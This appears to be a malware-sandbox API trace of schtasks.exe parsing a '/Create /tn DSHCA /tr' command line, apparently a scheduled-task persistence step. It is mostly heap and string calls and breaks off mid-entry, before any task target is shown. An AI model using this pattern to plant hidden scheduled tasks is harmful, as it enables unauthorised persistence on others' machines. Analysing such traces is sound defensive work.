[0171.698] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0171.698] VerifyVersionInfoW (in: lpVersionInformation=0x2df9ec, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x2df9ec) returned 1 [0171.698] GetProcessHeap () returned 0x9c0000 [0171.698] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4cd8 [0171.699] lstrlenW (lpString="") returned 0 [0171.699] GetProcessHeap () returned 0x9c0000 [0171.699] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x2) returned 0x9d50a8 [0171.699] GetProcessHeap () returned 0x9c0000 [0171.699] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d50b8 [0171.699] GetProcessHeap () returned 0x9c0000 [0171.699] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4cf0 [0171.699] GetProcessHeap () returned 0x9c0000 [0171.699] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d50d8 [0171.699] GetProcessHeap () returned 0x9c0000 [0171.699] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d50f8 [0171.699] GetProcessHeap () returned 0x9c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5118 [0171.700] GetProcessHeap () returned 0x9c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5138 [0171.700] GetProcessHeap () returned 0x9c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4d08 [0171.700] GetProcessHeap () returned 0x9c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5158 [0171.700] GetProcessHeap () returned 0x9c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5178 [0171.700] GetProcessHeap () returned 0x9c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5198 [0171.700] GetProcessHeap () returned 0x9c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d51b8 [0171.700] GetProcessHeap () returned 0x9c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4d20 [0171.700] GetProcessHeap () returned 0x9c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d51d8 [0171.701] GetProcessHeap () returned 0x9c0000 [0171.701] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5210 [0171.701] GetProcessHeap () returned 0x9c0000 [0171.701] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5230 [0171.701] GetProcessHeap () returned 0x9c0000 [0171.701] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5250 [0171.701] SetThreadUILanguage (LangId=0x0) returned 0x409 [0171.754] SetLastError (dwErrCode=0x0) [0171.754] GetProcessHeap () returned 0x9c0000 [0171.754] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5270 [0171.755] GetProcessHeap () returned 0x9c0000 [0171.755] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5290 [0171.755] GetProcessHeap () returned 0x9c0000 [0171.755] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d52b0 [0171.755] GetProcessHeap () returned 0x9c0000 [0171.755] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d52d0 [0171.755] GetProcessHeap () returned 0x9c0000 [0171.755] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d52f0 [0171.755] GetProcessHeap () returned 0x9c0000 [0171.755] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4d38 [0171.755] _memicmp (_Buf1=0x9d4d38, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.755] GetProcessHeap () returned 0x9c0000 [0171.755] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x208) returned 0x9d5b78 [0171.756] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9d5b78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0171.757] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x75440000 [0171.759] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0171.759] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0171.760] GetProcessHeap () returned 0x9c0000 [0171.760] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x74e) returned 0x9d5d88 [0171.760] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0171.760] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x9d5d88 | out: lpData=0x9d5d88) returned 1 [0171.761] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0171.761] VerQueryValueW (in: pBlock=0x9d5d88, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2dfaf4, puLen=0x2dfaf8 | out: lplpBuffer=0x2dfaf4*=0x9d6124, puLen=0x2dfaf8) returned 1 [0171.762] _memicmp (_Buf1=0x9d4d38, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.762] _vsnwprintf (in: _Buffer=0x9d5b78, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x2dfadc | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0171.762] VerQueryValueW (in: pBlock=0x9d5d88, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x2dfb04, puLen=0x2dfb00 | out: lplpBuffer=0x2dfb04*=0x9d5f50, puLen=0x2dfb00) returned 1 [0171.762] lstrlenW (lpString="schtasks.exe") returned 12 [0171.762] lstrlenW (lpString="schtasks.exe") returned 12 [0171.762] lstrlenW (lpString=".EXE") returned 4 [0171.762] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0171.783] lstrlenW (lpString="schtasks.exe") returned 12 [0171.783] lstrlenW (lpString=".EXE") returned 4 [0171.783] _memicmp (_Buf1=0x9d4d38, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.783] lstrlenW (lpString="schtasks") returned 8 [0171.784] GetProcessHeap () returned 0x9c0000 [0171.784] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5330 [0171.784] GetProcessHeap () returned 0x9c0000 [0171.784] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5350 [0171.784] GetProcessHeap () returned 0x9c0000 [0171.784] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5370 [0171.784] GetProcessHeap () returned 0x9c0000 [0171.784] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5390 [0171.784] GetProcessHeap () returned 0x9c0000 [0171.784] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4d98 [0171.784] _memicmp (_Buf1=0x9d4d98, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.785] GetProcessHeap () returned 0x9c0000 [0171.785] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xa0) returned 0x9d6768 [0171.785] GetProcessHeap () returned 0x9c0000 [0171.785] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d53b0 [0171.785] GetProcessHeap () returned 0x9c0000 [0171.785] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d53d0 [0171.785] GetProcessHeap () returned 0x9c0000 [0171.785] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d53f0 [0171.785] GetProcessHeap () returned 0x9c0000 [0171.786] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4db0 [0171.786] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.786] GetProcessHeap () returned 0x9c0000 [0171.786] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x200) returned 0x9d6810 [0171.786] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0171.786] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0171.786] GetProcessHeap () returned 0x9c0000 [0171.786] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x30) returned 0x9d6a18 [0171.786] _vsnwprintf (in: _Buffer=0x9d6768, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x2dfae0 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0171.786] GetProcessHeap () returned 0x9c0000 [0171.786] GetProcessHeap () returned 0x9c0000 [0171.786] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5d88) returned 1 [0171.787] GetProcessHeap () returned 0x9c0000 [0171.787] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5d88) returned 0x74e [0171.787] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5d88 | out: hHeap=0x9c0000) returned 1 [0171.787] SetLastError (dwErrCode=0x0) [0171.787] GetThreadLocale () returned 0x409 [0171.787] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0171.787] lstrlenW (lpString="?") returned 1 [0171.787] GetThreadLocale () returned 0x409 [0171.787] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0171.787] lstrlenW (lpString="create") returned 6 [0171.787] GetThreadLocale () returned 0x409 [0171.787] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0171.787] lstrlenW (lpString="delete") returned 6 [0171.787] GetThreadLocale () returned 0x409 [0171.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0171.788] lstrlenW (lpString="query") returned 5 [0171.788] GetThreadLocale () returned 0x409 [0171.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0171.788] lstrlenW (lpString="change") returned 6 [0171.788] GetThreadLocale () returned 0x409 [0171.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0171.788] lstrlenW (lpString="run") returned 3 [0171.788] GetThreadLocale () returned 0x409 [0171.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0171.788] lstrlenW (lpString="end") returned 3 [0171.788] GetThreadLocale () returned 0x409 [0171.788] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0171.788] lstrlenW (lpString="showsid") returned 7 [0171.789] GetThreadLocale () returned 0x409 [0171.789] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0171.789] SetLastError (dwErrCode=0x0) [0171.789] SetLastError (dwErrCode=0x0) [0171.789] lstrlenW (lpString="/Create") returned 7 [0171.789] lstrlenW (lpString="-/") returned 2 [0171.789] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0171.789] lstrlenW (lpString="?") returned 1 [0171.789] lstrlenW (lpString="?") returned 1 [0171.789] GetProcessHeap () returned 0x9c0000 [0171.789] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4dc8 [0171.790] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.790] GetProcessHeap () returned 0x9c0000 [0171.790] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xa) returned 0x9d4de0 [0171.790] lstrlenW (lpString="Create") returned 6 [0171.790] GetProcessHeap () returned 0x9c0000 [0171.790] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4df8 [0171.790] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.790] GetProcessHeap () returned 0x9c0000 [0171.790] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5410 [0171.790] _vsnwprintf (in: _Buffer=0x9d4de0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|?|") returned 3 [0171.791] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|Create|") returned 8 [0171.791] lstrlenW (lpString="|?|") returned 3 [0171.791] lstrlenW (lpString="|Create|") returned 8 [0171.791] SetLastError (dwErrCode=0x490) [0171.791] lstrlenW (lpString="create") returned 6 [0171.791] lstrlenW (lpString="create") returned 6 [0171.791] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.791] GetProcessHeap () returned 0x9c0000 [0171.791] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4de0) returned 1 [0171.791] GetProcessHeap () returned 0x9c0000 [0171.791] RtlReAllocateHeap (Heap=0x9c0000, Flags=0xc, Ptr=0x9d4de0, Size=0x14) returned 0x9d5430 [0171.792] lstrlenW (lpString="Create") returned 6 [0171.792] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.792] _vsnwprintf (in: _Buffer=0x9d5430, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|create|") returned 8 [0171.792] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|Create|") returned 8 [0171.792] lstrlenW (lpString="|create|") returned 8 [0171.792] lstrlenW (lpString="|Create|") returned 8 [0171.792] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0171.792] SetLastError (dwErrCode=0x0) [0171.792] SetLastError (dwErrCode=0x0) [0171.792] SetLastError (dwErrCode=0x0) [0171.792] lstrlenW (lpString="/tn") returned 3 [0171.792] lstrlenW (lpString="-/") returned 2 [0171.793] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0171.793] lstrlenW (lpString="?") returned 1 [0171.793] lstrlenW (lpString="?") returned 1 [0171.793] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.793] lstrlenW (lpString="tn") returned 2 [0171.793] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.793] _vsnwprintf (in: _Buffer=0x9d5430, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|?|") returned 3 [0171.793] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tn|") returned 4 [0171.793] lstrlenW (lpString="|?|") returned 3 [0171.793] lstrlenW (lpString="|tn|") returned 4 [0171.793] SetLastError (dwErrCode=0x490) [0171.793] lstrlenW (lpString="create") returned 6 [0171.794] lstrlenW (lpString="create") returned 6 [0171.794] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.794] lstrlenW (lpString="tn") returned 2 [0171.794] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.794] _vsnwprintf (in: _Buffer=0x9d5430, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|create|") returned 8 [0171.794] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tn|") returned 4 [0171.794] lstrlenW (lpString="|create|") returned 8 [0171.794] lstrlenW (lpString="|tn|") returned 4 [0171.794] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0171.794] SetLastError (dwErrCode=0x490) [0171.794] lstrlenW (lpString="delete") returned 6 [0171.794] lstrlenW (lpString="delete") returned 6 [0171.794] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.795] lstrlenW (lpString="tn") returned 2 [0171.795] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.795] _vsnwprintf (in: _Buffer=0x9d5430, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|delete|") returned 8 [0171.795] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tn|") returned 4 [0171.795] lstrlenW (lpString="|delete|") returned 8 [0171.795] lstrlenW (lpString="|tn|") returned 4 [0171.795] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0171.795] SetLastError (dwErrCode=0x490) [0171.795] lstrlenW (lpString="query") returned 5 [0171.795] lstrlenW (lpString="query") returned 5 [0171.795] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.795] lstrlenW (lpString="tn") returned 2 [0171.795] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.796] _vsnwprintf (in: _Buffer=0x9d5430, _BufferCount=0x8, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|query|") returned 7 [0171.796] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tn|") returned 4 [0171.796] lstrlenW (lpString="|query|") returned 7 [0171.796] lstrlenW (lpString="|tn|") returned 4 [0171.796] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0171.796] SetLastError (dwErrCode=0x490) [0171.796] lstrlenW (lpString="change") returned 6 [0171.796] lstrlenW (lpString="change") returned 6 [0171.796] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.796] lstrlenW (lpString="tn") returned 2 [0171.796] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.797] _vsnwprintf (in: _Buffer=0x9d5430, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|change|") returned 8 [0171.797] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tn|") returned 4 [0171.797] lstrlenW (lpString="|change|") returned 8 [0171.797] lstrlenW (lpString="|tn|") returned 4 [0171.797] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0171.797] SetLastError (dwErrCode=0x490) [0171.797] lstrlenW (lpString="run") returned 3 [0171.797] lstrlenW (lpString="run") returned 3 [0171.797] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.797] lstrlenW (lpString="tn") returned 2 [0171.797] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.798] _vsnwprintf (in: _Buffer=0x9d5430, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|run|") returned 5 [0171.798] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tn|") returned 4 [0171.798] lstrlenW (lpString="|run|") returned 5 [0171.798] lstrlenW (lpString="|tn|") returned 4 [0171.798] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0171.798] SetLastError (dwErrCode=0x490) [0171.798] lstrlenW (lpString="end") returned 3 [0171.798] lstrlenW (lpString="end") returned 3 [0171.798] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.798] lstrlenW (lpString="tn") returned 2 [0171.798] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.798] _vsnwprintf (in: _Buffer=0x9d5430, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|end|") returned 5 [0171.799] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tn|") returned 4 [0171.799] lstrlenW (lpString="|end|") returned 5 [0171.799] lstrlenW (lpString="|tn|") returned 4 [0171.799] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0171.799] SetLastError (dwErrCode=0x490) [0171.799] lstrlenW (lpString="showsid") returned 7 [0171.799] lstrlenW (lpString="showsid") returned 7 [0171.799] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.799] GetProcessHeap () returned 0x9c0000 [0171.799] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5430) returned 1 [0171.799] GetProcessHeap () returned 0x9c0000 [0171.799] RtlReAllocateHeap (Heap=0x9c0000, Flags=0xc, Ptr=0x9d5430, Size=0x16) returned 0x9d5450 [0171.799] lstrlenW (lpString="tn") returned 2 [0171.799] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.800] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0xa, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|showsid|") returned 9 [0171.800] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tn|") returned 4 [0171.800] lstrlenW (lpString="|showsid|") returned 9 [0171.800] lstrlenW (lpString="|tn|") returned 4 [0171.800] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0171.800] SetLastError (dwErrCode=0x490) [0171.800] SetLastError (dwErrCode=0x490) [0171.800] SetLastError (dwErrCode=0x0) [0171.800] lstrlenW (lpString="/tn") returned 3 [0171.800] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0171.800] SetLastError (dwErrCode=0x490) [0171.800] SetLastError (dwErrCode=0x0) [0171.801] lstrlenW (lpString="/tn") returned 3 [0171.801] GetProcessHeap () returned 0x9c0000 [0171.801] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x8) returned 0x9d6a50 [0171.801] GetProcessHeap () returned 0x9c0000 [0171.801] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5430 [0171.801] SetLastError (dwErrCode=0x0) [0171.801] SetLastError (dwErrCode=0x0) [0171.801] lstrlenW (lpString="DSHCA") returned 5 [0171.801] lstrlenW (lpString="-/") returned 2 [0171.801] StrChrIW (lpStart="-/", wMatch=0x44) returned 0x0 [0171.801] SetLastError (dwErrCode=0x490) [0171.801] SetLastError (dwErrCode=0x490) [0171.801] SetLastError (dwErrCode=0x0) [0171.801] lstrlenW (lpString="DSHCA") returned 5 [0171.802] StrChrIW (lpStart="DSHCA", wMatch=0x3a) returned 0x0 [0171.802] SetLastError (dwErrCode=0x490) [0171.802] SetLastError (dwErrCode=0x0) [0171.802] lstrlenW (lpString="DSHCA") returned 5 [0171.802] GetProcessHeap () returned 0x9c0000 [0171.802] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xc) returned 0x9d4de0 [0171.802] GetProcessHeap () returned 0x9c0000 [0171.802] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5470 [0171.802] SetLastError (dwErrCode=0x0) [0171.802] SetLastError (dwErrCode=0x0) [0171.802] lstrlenW (lpString="/tr") returned 3 [0171.802] lstrlenW (lpString="-/") returned 2 [0171.802] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0171.802] lstrlenW (lpString="?") returned 1 [0171.802] lstrlenW (lpString="?") returned 1 [0171.803] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.803] lstrlenW (lpString="tr") returned 2 [0171.803] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.803] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|?|") returned 3 [0171.803] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tr|") returned 4 [0171.803] lstrlenW (lpString="|?|") returned 3 [0171.803] lstrlenW (lpString="|tr|") returned 4 [0171.803] SetLastError (dwErrCode=0x490) [0171.803] lstrlenW (lpString="create") returned 6 [0171.803] lstrlenW (lpString="create") returned 6 [0171.803] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.804] lstrlenW (lpString="tr") returned 2 [0171.804] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.804] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|create|") returned 8 [0171.804] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tr|") returned 4 [0171.804] lstrlenW (lpString="|create|") returned 8 [0171.804] lstrlenW (lpString="|tr|") returned 4 [0171.804] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0171.804] SetLastError (dwErrCode=0x490) [0171.804] lstrlenW (lpString="delete") returned 6 [0171.804] lstrlenW (lpString="delete") returned 6 [0171.804] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.804] lstrlenW (lpString="tr") returned 2 [0171.804] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.805] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|delete|") returned 8 [0171.805] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tr|") returned 4 [0171.805] lstrlenW (lpString="|delete|") returned 8 [0171.805] lstrlenW (lpString="|tr|") returned 4 [0171.805] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0171.805] SetLastError (dwErrCode=0x490) [0171.805] lstrlenW (lpString="query") returned 5 [0171.805] lstrlenW (lpString="query") returned 5 [0171.805] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.805] lstrlenW (lpString="tr") returned 2 [0171.805] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.805] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x8, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|query|") returned 7 [0171.805] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tr|") returned 4 [0171.806] lstrlenW (lpString="|query|") returned 7 [0171.806] lstrlenW (lpString="|tr|") returned 4 [0171.806] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0171.806] SetLastError (dwErrCode=0x490) [0171.806] lstrlenW (lpString="change") returned 6 [0171.806] lstrlenW (lpString="change") returned 6 [0171.806] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.806] lstrlenW (lpString="tr") returned 2 [0171.806] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.806] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|change|") returned 8 [0171.806] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: 